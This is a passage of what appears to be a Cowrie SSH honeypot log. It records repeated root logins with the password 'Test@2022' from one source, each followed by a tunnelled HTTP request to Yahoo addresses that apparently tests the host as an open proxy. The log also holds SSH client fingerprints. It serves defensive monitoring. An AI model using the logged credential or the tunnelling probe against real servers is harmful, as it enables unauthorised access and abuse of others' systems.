-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.915371Z","src_ip":"213.209.150.239","session":"78c3a806ab94"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.150316Z","src_ip":"213.209.150.239","session":"78c3a806ab94"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":32544,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:32544","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.198403Z","session":"78c3a806ab94"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.245707Z","src_ip":"213.209.150.239","session":"78c3a806ab94"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":29011,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:29011","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.381377Z","session":"78c3a806ab94"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.428450Z","src_ip":"213.209.150.239","session":"78c3a806ab94"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.476047Z","src_ip":"213.209.150.239","session":"78c3a806ab94"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51011,"dst_ip":"1.2.3.4","dst_port":22,"session":"81e9e74b43ba","protocol":"ssh","message":"New connection: 213.209.150.239:51011 (1.2.3.4:22) [session: 81e9e74b43ba]","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.531911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.532837Z","src_ip":"213.209.150.239","session":"81e9e74b43ba"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.589393Z","src_ip":"213.209.150.239","session":"81e9e74b43ba"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.871916Z","src_ip":"213.209.150.239","session":"81e9e74b43ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":3487,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:3487","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.929594Z","session":"81e9e74b43ba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:08.986182Z","src_ip":"213.209.150.239","session":"81e9e74b43ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":11586,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11586","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.142961Z","session":"81e9e74b43ba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.199505Z","src_ip":"213.209.150.239","session":"81e9e74b43ba"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.256965Z","src_ip":"213.209.150.239","session":"81e9e74b43ba"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51066,"dst_ip":"1.2.3.4","dst_port":22,"session":"255b92fdf49d","protocol":"ssh","message":"New connection: 213.209.150.239:51066 (1.2.3.4:22) [session: 255b92fdf49d]","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.302848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.303748Z","src_ip":"213.209.150.239","session":"255b92fdf49d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.350829Z","src_ip":"213.209.150.239","session":"255b92fdf49d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.585628Z","src_ip":"213.209.150.239","session":"255b92fdf49d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":23326,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:23326","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.633805Z","session":"255b92fdf49d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.681587Z","src_ip":"213.209.150.239","session":"255b92fdf49d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":15987,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:15987","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.817440Z","session":"255b92fdf49d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.864901Z","src_ip":"213.209.150.239","session":"255b92fdf49d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.912582Z","src_ip":"213.209.150.239","session":"255b92fdf49d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51105,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4b45cfd07df","protocol":"ssh","message":"New connection: 213.209.150.239:51105 (1.2.3.4:22) [session: c4b45cfd07df]","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.968174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:09.968968Z","src_ip":"213.209.150.239","session":"c4b45cfd07df"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.025645Z","src_ip":"213.209.150.239","session":"c4b45cfd07df"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.308600Z","src_ip":"213.209.150.239","session":"c4b45cfd07df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":18559,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:18559","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.366306Z","session":"c4b45cfd07df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.423048Z","src_ip":"213.209.150.239","session":"c4b45cfd07df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":9219,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:9219","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.579151Z","session":"c4b45cfd07df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.636044Z","src_ip":"213.209.150.239","session":"c4b45cfd07df"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.693349Z","src_ip":"213.209.150.239","session":"c4b45cfd07df"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51163,"dst_ip":"1.2.3.4","dst_port":22,"session":"d77abdca1783","protocol":"ssh","message":"New connection: 213.209.150.239:51163 (1.2.3.4:22) [session: d77abdca1783]","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.739815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.740557Z","src_ip":"213.209.150.239","session":"d77abdca1783"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.788041Z","src_ip":"213.209.150.239","session":"d77abdca1783"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":42952,"dst_ip":"1.2.3.4","dst_port":22,"session":"b79f5c31564b","protocol":"ssh","message":"New connection: 27.112.78.170:42952 (1.2.3.4:22) [session: b79f5c31564b]","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.919810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:10.920995Z","src_ip":"27.112.78.170","session":"b79f5c31564b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.023294Z","src_ip":"213.209.150.239","session":"d77abdca1783"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":7674,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7674","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.071544Z","session":"d77abdca1783"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.118788Z","src_ip":"213.209.150.239","session":"d77abdca1783"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.193392Z","src_ip":"27.112.78.170","session":"b79f5c31564b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":14600,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:14600","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.257600Z","session":"d77abdca1783"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.304999Z","src_ip":"213.209.150.239","session":"d77abdca1783"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.352904Z","src_ip":"213.209.150.239","session":"d77abdca1783"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51210,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2c2b9b51c98","protocol":"ssh","message":"New connection: 213.209.150.239:51210 (1.2.3.4:22) [session: d2c2b9b51c98]","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.398984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.399721Z","src_ip":"213.209.150.239","session":"d2c2b9b51c98"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecd